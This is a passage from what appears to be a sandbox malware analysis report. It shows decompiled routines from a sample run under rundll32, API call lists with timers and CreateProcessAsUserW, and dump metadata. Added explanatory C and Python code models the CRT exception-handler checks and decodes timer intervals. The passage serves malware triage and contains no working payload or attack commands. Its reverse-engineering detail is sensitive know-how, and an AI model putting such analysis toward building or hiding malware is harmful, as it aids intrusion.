                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                            									__eflags =  *_t71 - 0x4550;
                            									if( *_t71 != 0x4550) {
                            										goto L59;
                            									}
                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                            										goto L59;
                            									}
                            									_t78 = _t76 - _t87;
                            									__eflags =  *((short*)(_t71 + 6));
                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                            									if( *((short*)(_t71 + 6)) <= 0) {
                            										goto L59;
                            									}
                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                            									__eflags = _t78 - _t72;
                            									if(_t78 < _t72) {
                            										goto L46;
                            									}
                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                            										goto L46;
                            									}
                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                            										goto L20;
                            									}
                            									goto L46;
                            								}
                            							} else {
                            								goto L16;
                            							}
                            							while(1) {
                            								L16:
                            								__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 + 1;
                            								__eflags = _t58 - _t81;
                            								if(_t58 < _t81) {
                            									continue;
                            								}
                            								goto L18;
                            							}
                            							__eflags = _t58;
                            							if(_t58 <= 0) {
                            								goto L5;
                            							}
                            							 *0x4a1a3c8 = 1;
                            							__eflags =  *0x4a1a3c8;
                            							if( *0x4a1a3c8 != 0) {
                            								goto L5;
                            							}
                            							__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
                            							if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
                            								L32:
                            								_t100 = 0;
                            								__eflags = _t58;
                            								if(_t58 < 0) {
                            									L34:
                            									 *0x4a1a3c8 = 0;
                            									goto L5;
                            								} else {
                            									goto L33;
                            								}
                            								do {
                            									L33:
                            									_t90 = 0x4a1a388 + _t100 * 4;
                            									_t100 = _t100 + 1;
                            									__eflags = _t100 - _t58;
                            									 *_t90 = _t110;
                            									_t110 =  *_t90;
                            								} while (_t100 <= _t58);
                            								goto L34;
                            							}
                            							_t25 = _t81 - 1; // -1
                            							_t58 = _t25;
                            							__eflags = _t58;
                            							if(_t58 < 0) {
                            								L28:
                            								__eflags = _t81 - 0x10;
                            								if(_t81 < 0x10) {
                            									_t81 = _t81 + 1;
                            									__eflags = _t81;
                            									 *0x4a1a380 = _t81;
                            								}
                            								_t28 = _t81 - 1; // 0x0
                            								_t58 = _t28;
                            								goto L32;
                            							} else {
                            								goto L25;
                            							}
                            							while(1) {
                            								L25:
                            								__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 - 1;
                            								__eflags = _t58;
                            								if(_t58 >= 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							__eflags = _t58;
                            							if(__eflags >= 0) {
                            								if(__eflags == 0) {
                            									goto L34;
                            								}
                            								goto L32;
                            							}
                            							goto L28;
                            						}
                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                            						__eflags = _t75 - _v8;
                            						if(_t75 < _v8) {
                            							goto L20;
                            						}
                            						__eflags = _t75 - _t108;
                            						if(_t75 >= _t108) {
                            							goto L20;
                            						}
                            						goto L15;
                            					}
                            					L5:
                            					_t63 = 1;
                            					goto L60;
                            				} else {
                            					goto L3;
                            				}
                            			}
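The checks performed by the routine above, as an added example that is not code from the report, the sample or the CRT: a portable C re-implementation run over constructed inputs (a headers-only PE32 image and a buffer standing in for the thread stack, both built in the code). NtQueryVirtualMemory is replaced by a caller-supplied vm_info_t, the 16-entry validated-page cache is omitted, and the names validate_eh3, run_scenario and build_image are this example's own. Each scenario returns the verdict the decompiled code would give on the same input (1 trusted, 0 rejected, -1 not validated).

```c
/* Added example: portable re-implementation of the checks in the decompiled routine
 * above, not the sample's or Joe Sandbox's code. Layouts follow the decompilation:
 * registration record {Next, Handler, ScopeTable, TryLevel} with SavedESP at record-8,
 * 12-byte scope entries {EnclosingLevel, Filter, Handler}, MEMORY_BASIC_INFORMATION
 * fields Protect (+0x14) and Type (+0x18). The 16-entry page cache is omitted and
 * NtQueryVirtualMemory is replaced by a caller-supplied vm_info_t (assumption). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_IMAGE      0x1000000u
#define PROT_WRITABLE  0xCCu   /* PAGE_READWRITE|WRITECOPY|EXECUTE_READWRITE|EXECUTE_WRITECOPY */

typedef struct { uint32_t enclosing_level, filter, handler; } scope_entry_t;
typedef struct { uintptr_t saved_esp; const scope_entry_t *scope_table; uint32_t try_level; } eh3_record_t;
typedef struct { uint32_t type, protect; const uint8_t *allocation_base; } vm_info_t;

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Verdict: 1 = trusted, 0 = rejected as tampered, -1 = could not be validated. */
int validate_eh3(const eh3_record_t *rn, uintptr_t stack_limit, uintptr_t stack_base,
                 const vm_info_t *vm)
{
    uintptr_t st = (uintptr_t)rn->scope_table;
    if (st & 3) return 0;                                 /* table must be 4-byte aligned */
    if (st >= stack_limit && st < stack_base) return 0;   /* table on the stack is attacker-writable */
    if (rn->try_level != 0xffffffffu) {
        uint32_t filters = 0;
        for (uint32_t i = 0; i <= rn->try_level; i++) {
            const scope_entry_t *e = &rn->scope_table[i];
            if (e->enclosing_level != 0xffffffffu && e->enclosing_level >= i) return 0; /* must nest outward */
            if (e->filter) filters++;
        }
        /* a filter runs on SavedESP, which must lie inside the stack and below the record */
        if (filters && (rn->saved_esp < stack_limit || rn->saved_esp >= (uintptr_t)rn)) return 0;
    }
    if (!vm || vm->type != MEM_IMAGE) return -1;          /* query failed / not a mapped image */
    if ((vm->protect & PROT_WRITABLE) == 0) return 1;     /* read-only image page: accept */
    /* writable image page: walk MZ/PE headers, reject if the table is in a writable first section */
    const uint8_t *base = vm->allocation_base;
    if (rd16(base) != 0x5a4d) return -1;
    const uint8_t *nt = base + rd32(base + 0x3c);
    if (rd32(nt) != 0x4550 || rd16(nt + 0x18) != 0x10b) return -1;   /* PE\0\0, PE32 magic */
    if ((int16_t)rd16(nt + 6) <= 0) return -1;                        /* NumberOfSections */
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);                 /* first section header */
    uint32_t rva = (uint32_t)(st - (uintptr_t)base), va = rd32(sec + 0xc), vsz = rd32(sec + 8);
    if (rva >= va && rva < va + vsz && (sec[0x27] & 0x80)) return 0;  /* IMAGE_SCN_MEM_WRITE */
    return 1;
}

/* Constructed inputs: a headers-only PE32 image with one section at RVA 0x200 holding a
 * two-entry scope table, and a 4 KiB buffer standing in for the thread stack. */
static _Alignas(16) uint8_t g_image[0x400];
static _Alignas(16) uint8_t g_stack[0x1000];

static scope_entry_t *build_image(int writable_section)
{
    memset(g_image, 0, sizeof g_image);
    wr16(g_image, 0x5a4d);  wr32(g_image + 0x3c, 0x80);
    uint8_t *nt = g_image + 0x80;
    wr32(nt, 0x4550);  wr16(nt + 6, 1);  wr16(nt + 0x14, 0xe0);  wr16(nt + 0x18, 0x10b);
    uint8_t *sec = nt + 0x18 + 0xe0;
    wr32(sec + 8, 0x200);  wr32(sec + 0xc, 0x200);
    wr32(sec + 0x24, writable_section ? 0xC0000040u : 0x60000020u); /* .data-like vs .text-like */
    scope_entry_t *tbl = (scope_entry_t *)(g_image + 0x200);
    tbl[0] = (scope_entry_t){ 0xffffffffu, 0,      0x1000 };   /* outermost try, no filter */
    tbl[1] = (scope_entry_t){ 0,           0x2000, 0x3000 };   /* nested try with a filter */
    return tbl;
}

/* Scenarios a triager would step through; each returns validate_eh3()'s verdict. */
int run_scenario(int which)
{
    scope_entry_t *tbl = build_image(which == 5);
    uintptr_t limit = (uintptr_t)g_stack, base = limit + sizeof g_stack;
    eh3_record_t *rn = (eh3_record_t *)(g_stack + 0x800);
    *rn = (eh3_record_t){ limit + 0x400, tbl, 1 };            /* SavedESP below the record */
    vm_info_t vm = { MEM_IMAGE, 0x20 /* PAGE_EXECUTE_READ */, g_image }, *vmp = &vm;
    switch (which) {
    case 0: break;                                                /* clean record               -> 1  */
    case 1: memcpy(g_stack + 0x100, tbl, 2 * sizeof *tbl);        /* table copied to the stack  -> 0  */
            rn->scope_table = (scope_entry_t *)(g_stack + 0x100); break;
    case 2: tbl[1].enclosing_level = 1; break;                    /* entry encloses itself      -> 0  */
    case 3: rn->saved_esp = (uintptr_t)rn + 0x10; break;          /* SavedESP above the record  -> 0  */
    case 4: vm.type = 0x20000; break;                             /* MEM_PRIVATE, not an image  -> -1 */
    case 5: vm.protect = 0x40; break;                             /* RWX page, writable section -> 0  */
    case 6: vm.protect = 0x40; break;                             /* RWX page, code section     -> 1  */
    case 7: vmp = NULL; break;                                    /* query failed               -> -1 */
    }
    return validate_eh3(rn, limit, base, vmp);
}

int main(void)
{
    for (int i = 0; i <= 7; i++) printf("scenario %d -> %d\n", i, run_scenario(i));
    return 0;
}
```

Scenario 4 is the case that matters when reading dumps like the ones in this report: a scope table that lives in private memory rather than a mapped image cannot be validated by these checks at all, and the routine reports -1 instead of trusting the handler. Scenarios 5 and 6 show why the PE header walk exists: a writable page is tolerated only when the section it belongs to is not itself marked writable.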

                             [Per-line address column for E04A184C1 (Joe Sandbox IDA plugin), covering 0x04a184cb to 0x04a186de; the line-by-line pairing with the C code is not preserved here.]

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04A18572
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: 2c16ace53711c09604c94edfe1a939e8e5a8f4aeb0573eab283450eedcc9afbb
                            • Instruction ID: 46bde0a2027c29c6efd4f8dca21837209fe51690f4fed6a0fe1dfbcac1e0e945
                            • Opcode Fuzzy Hash: 2c16ace53711c09604c94edfe1a939e8e5a8f4aeb0573eab283450eedcc9afbb
                            • Instruction Fuzzy Hash: 8561E4347006159FDB29EF29C99066973A2FB89364F248A2DD857CB2B4E73DF8428740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04F78EC7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessUser
                            • String ID:
                            • API String ID: 2217836671-0
                            • Opcode ID: 9ab98bd4843a2df4ac8b19a7a084fabd866b1d64e17c2ae9836569d3666f8558
                            • Instruction ID: c6e72491d28ac94496ba4deed68b683141b42f543668d46ae7e65e5de82a1137
                            • Opcode Fuzzy Hash: 9ab98bd4843a2df4ac8b19a7a084fabd866b1d64e17c2ae9836569d3666f8558
                            • Instruction Fuzzy Hash: D811B33250414DBFDF025E98DD04DEA7BAAFF0C3A4B09511AFE1956120C736D872AF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F636D3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorStatus
                            • String ID:
                            • API String ID: 1596131371-0
                            • Opcode ID: d78c83681be9171929a427a101338b4d42dd60db73cfb8e3616652f3f606c531
                            • Instruction ID: bb2d292170859ab6081c938d580ad7ea10743df4024c6023e900bce7c4123622
                            • Opcode Fuzzy Hash: d78c83681be9171929a427a101338b4d42dd60db73cfb8e3616652f3f606c531
                            • Instruction Fuzzy Hash: C6C012369052027BDA095A50E828D3A7E51EB50340F00441CB54688060CA759850C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                            • Instruction ID: c1c644c12188c8c03b4a164d15e75fcba5e9c6277b8becfd520ba98780ea0b2f
                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                            • Instruction Fuzzy Hash: BE21A472900204ABDB14EF68CCC096BB7A5FF44710B05856DDD558F255E731F91AC7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E04A1829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                            				intOrPtr _v8;
                            				char _v12;
                            				void* __ebp;
                            				signed int* _t43;
                            				char _t44;
                            				void* _t46;
                            				void* _t49;
                            				intOrPtr* _t53;
                            				void* _t54;
                            				void* _t65;
                            				long _t66;
                            				signed int* _t80;
                            				signed int* _t82;
                            				void* _t84;
                            				signed int _t86;
                            				void* _t89;
                            				void* _t95;
                            				void* _t96;
                            				void* _t99;
                            				void* _t106;
                            
                            				_t43 = _t84;
                            				_t65 = __ebx + 2;
                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                            				_t89 = _t95;
                            				_t96 = _t95 - 8;
                            				_push(_t65);
                            				_push(_t84);
                            				_push(_t89);
                            				asm("cld");
                            				_t66 = _a8;
                            				_t44 = _a4;
                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                            					_push(_t89);
                            					E04A18407(_t66 + 0x10, _t66, 0xffffffff);
                            					_t46 = 1;
                            				} else {
                            					_v12 = _t44;
                            					_v8 = _a12;
                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                            					_t86 =  *(_t66 + 0xc);
                            					_t80 =  *(_t66 + 8);
                            					_t49 = E04A184C1(_t66);
                            					_t99 = _t96 + 4;
                            					if(_t49 == 0) {
                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            						goto L11;
                            					} else {
                            						while(_t86 != 0xffffffff) {
                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                            							if(_t53 == 0) {
                            								L8:
                            								_t80 =  *(_t66 + 8);
                            								_t86 = _t80[_t86 + _t86 * 2];
                            								continue;
                            							} else {
                            								_t54 =  *_t53();
                            								_t89 = _t89;
                            								_t86 = _t86;
                            								_t66 = _a8;
                            								_t55 = _t54;
                            								_t106 = _t54;
                            								if(_t106 == 0) {
                            									goto L8;
                            								} else {
                            									if(_t106 < 0) {
                            										_t46 = 0;
                            									} else {
                            										_t82 =  *(_t66 + 8);
                            										E04A183AC(_t55, _t66);
                            										_t89 = _t66 + 0x10;
                            										E04A18407(_t89, _t66, 0);
                            										_t99 = _t99 + 0xc;
                            										E04A184A3(_t82[2]);
                            										 *(_t66 + 0xc) =  *_t82;
                            										_t66 = 0;
                            										_t86 = 0;
                            										 *(_t82[2])(1);
                            										goto L8;
                            									}
                            								}
                            							}
                            							goto L13;
                            						}
                            						L11:
                            						_t46 = 1;
                            					}
                            				}
                            				L13:
                            				return _t46;
                            			}

Address column for the listing of E04A1829C above (0x04a182a0 to 0x04a18389, one address per source line, 0x00000000 for lines that emit no code); the alignment with the source lines was lost in extraction.

                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: 346e7e8849604b6b91c5fe65ebe24afd0e117dfec154f05a3178facf7ce40e85
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: 3F21B6729002049FDB10EF68C8C49ABB7A9FF44350B49856CD9599B255EB34FA15C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%
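The decompiled routine E04A1829C above has the shape of the 32-bit MSVC CRT's SEH frame dispatcher, _except_handler3: the test of the exception record's flags (offset +4) against 6, i.e. EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND, at entry; the registration record read at +8 (scope table) and +0xc (trylevel); scope-table entries of three DWORDs (previous trylevel, filter, handler) indexed as (trylevel*3)*4 with the filter fetched at +4; the three-way test of the filter result (0 steps to the enclosing level, negative returns disposition 0, positive unwinds and calls the handler at +8); and the trylevel update from the entry's first DWORD before the handler is called. That identification is the editor's reading of the listing, not a statement in the report; if it holds, the function is statically linked runtime support rather than sample-specific logic, which matters when deciding where to spend analysis time. The Python below is an added model of that walk written for this page (not the sample's code and not Microsoft's), with constructed scope tables and filter results standing in for the real x86 frames.

```python
"""Model of the SEH scope-table walk performed by E04A1829C.

Editor's illustration, not code from the report or the sample. Frames,
scope tables and filters are plain Python objects; the real handler works
on x86 stack frames and switches EBP before calling each filter.
"""

# Exception flags tested at entry: (flags & 6) != 0 means an unwind pass.
EXCEPTION_UNWINDING = 0x2
EXCEPTION_EXIT_UNWIND = 0x4
TRYLEVEL_NONE = -1  # 0xffffffff, the loop's stop value in the listing

# Filter results, i.e. what the __except(...) expression evaluates to.
EXCEPTION_CONTINUE_SEARCH = 0
EXCEPTION_CONTINUE_EXECUTION = -1
EXCEPTION_EXECUTE_HANDLER = 1

# Dispositions the handler returns to the OS exception dispatcher.
ExceptionContinueExecution = 0
ExceptionContinueSearch = 1


class ScopeEntry:
    """One three-DWORD scope-table entry: +0 prev trylevel, +4 filter, +8 handler."""

    def __init__(self, prev, filt, handler):
        self.prev = prev
        self.filt = filt        # None models a __finally block, which has no filter
        self.handler = handler


class RegistrationFrame:
    """The two fields of the registration record the listing reads: +8 and +0xc."""

    def __init__(self, scopetable, trylevel):
        self.scopetable = scopetable
        self.trylevel = trylevel


def except_handler3(exception_flags, frame, trace):
    """Return the disposition; append unwind and handler events to trace."""
    if exception_flags & (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND):
        # Unwind pass: run __finally blocks down to TRYLEVEL_NONE, keep searching.
        trace.append("local_unwind(TRYLEVEL_NONE)")
        return ExceptionContinueSearch

    trylevel = frame.trylevel
    while trylevel != TRYLEVEL_NONE:
        entry = frame.scopetable[trylevel]
        if entry.filt is None:
            trylevel = entry.prev              # __finally: no filter, step outward
            continue
        result = entry.filt()
        if result == EXCEPTION_CONTINUE_SEARCH:
            trylevel = entry.prev              # ask the enclosing __try
            continue
        if result < 0:
            return ExceptionContinueExecution  # resume at the faulting instruction
        # EXCEPTION_EXECUTE_HANDLER: unwind everything inside, then run the handler.
        trace.append("global_unwind")
        trace.append("local_unwind(%d)" % trylevel)
        frame.trylevel = entry.prev            # *(frame+0xc) = entry[0] in the listing
        entry.handler()                        # the real __except body never returns here
        return "handler_ran"                   # model-only marker for the caller
    return ExceptionContinueSearch


def run_scenario(outer_result, inner_result, flags=0):
    """Two nested __try levels; return (disposition, trace, handlers run, trylevel)."""
    called = []
    trace = []
    table = [
        ScopeEntry(TRYLEVEL_NONE, lambda: outer_result, lambda: called.append("outer")),
        ScopeEntry(0, lambda: inner_result, lambda: called.append("inner")),
    ]
    frame = RegistrationFrame(table, trylevel=1)
    disposition = except_handler3(flags, frame, trace)
    return disposition, trace, called, frame.trylevel
```

run_scenario(0, 1) exercises the inner __except, run_scenario(1, 0) falls through to the outer one, and run_scenario(0, -1) shows the continue-execution path that returns disposition 0, which is the `_t46 = 0` branch in the listing.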

                            APIs
                              • Part of subcall function 04F75C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04F75C5C
                              • Part of subcall function 04F75C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F75D1D
                              • Part of subcall function 04F75C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D26
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 04F63860
                              • Part of subcall function 04F6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                              • Part of subcall function 04F6A976: CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                              • Part of subcall function 04F6A976: GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                              • Part of subcall function 04F6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                              • Part of subcall function 04F6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 04F638C3
                            • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 04F6393F
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F63961
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04F639A1
                              • Part of subcall function 04F6F08E: RtlAllocateHeap.NTDLL(00000000,00000010,7620F730), ref: 04F6F0B0
                              • Part of subcall function 04F6F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,04F63899,?), ref: 04F6F0DE
                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 04F63A47
                            • CloseHandle.KERNEL32(?), ref: 04F63CD6
                              • Part of subcall function 04F6E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,04F63A69,?), ref: 04F6E2F2
                              • Part of subcall function 04F6E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,04F63A69,?), ref: 04F6E320
                              • Part of subcall function 04F6E2E6: ResetEvent.KERNEL32(?,?,?,?,?,04F63A69,?), ref: 04F6E33A
                            • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 04F63A7C
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63A8B
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63AB8
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63AD2
                            • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 04F63B1A
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 04F63B34
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F63B4A
                            • ReleaseMutex.KERNEL32(?), ref: 04F63B67
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63B78
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63B87
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63BBB
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63BD5
                            • SwitchToThread.KERNEL32 ref: 04F63BD7
                            • ReleaseMutex.KERNEL32(?), ref: 04F63BE1
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C1F
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C2A
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63C4D
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63C67
                            • SwitchToThread.KERNEL32 ref: 04F63C69
                            • ReleaseMutex.KERNEL32(?), ref: 04F63C73
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C88
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63CEA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63CF6
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D02
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D0E
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D1A
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D26
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D32
                            • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04F63D41
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                            • String ID:
                            • API String ID: 2369282788-0
                            • Opcode ID: d073a536c84680790f2ff61d96eb401f76d5561b6ae06aa20f9fc92ca801846a
                            • Instruction ID: 28ff31550eb43eb2b0aee30ac3fed6fc9a34d4da32691b2f97bab673fb810ede
                            • Opcode Fuzzy Hash: d073a536c84680790f2ff61d96eb401f76d5561b6ae06aa20f9fc92ca801846a
                            • Instruction Fuzzy Hash: C8E192B1804309AFD711AF64EC80D7EBBE9FB44358F044A2EF996961A0D775EC068F52
                            Uniqueness

                            Uniqueness Score: -1.00%
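Several calls in the listing above multiply a value by the 64-bit operand printed as (FF676980, 000000FF) and hand the product to SetWaitableTimer. The report renders a sign-extended byte immediate of -1 as 000000FF (the same listing prints the INFINITE timeout of WaitForMultipleObjects that way), so the operand is 0xFFFFFFFFFF676980, which is -10,000,000: the factor that turns seconds into the negative, relative 100-nanosecond due time SetWaitableTimer expects. The call at 04F63B1A with 0000003C therefore programs a 60-second relative timer, and the other calls take a runtime value in seconds. The Python below is an added helper that decodes such _allmul lines from the report text; it is the editor's code, not part of the report or the sample, and both the 000000FF-means-minus-one rule and the handling of the three-argument form (where the report omits the multiplicand's low half) are assumptions it states in comments.

```python
"""Decode _allmul(...) argument lines from the report into timer intervals.

Editor's helper, not part of the report or the sample. Input lines are the
report's own API-call strings; reading the product as a SetWaitableTimer
relative due time (seconds * -10,000,000) is the editor's interpretation.
"""
import re

HUNDRED_NS_PER_SECOND = 10_000_000

# Argument list of an _allmul call as the report prints it.
ALLMUL_RE = re.compile(r"_allmul\.NTDLL\(([0-9A-Fa-f?,]+)\)")


def normalize_word(text):
    """Parse one printed 32-bit argument.

    Assumption: the report prints a sign-extended byte immediate of -1
    (push -1) as 000000FF, as it does for the INFINITE timeout of
    WaitForMultipleObjects in this listing, so 0xFF is mapped back to
    0xFFFFFFFF. A genuine 255 among these arguments would be misread.
    """
    word = int(text, 16)
    return 0xFFFFFFFF if word == 0xFF else word


def to_signed64(lo, hi):
    """Join two 32-bit halves into a signed 64-bit integer (two's complement)."""
    value = ((hi & 0xFFFFFFFF) << 32) | (lo & 0xFFFFFFFF)
    return value - (1 << 64) if value & (1 << 63) else value


def wrap_signed64(value):
    """Reduce a Python int to the signed 64-bit result _allmul would return."""
    value &= (1 << 64) - 1
    return value - (1 << 64) if value & (1 << 63) else value


def decode_allmul(line):
    """Return (multiplicand, multiplier, product) as signed ints, or None.

    Four printed arguments are (a_lo, a_hi, b_lo, b_hi). With three printed
    arguments the multiplicand's low half was a runtime value the report
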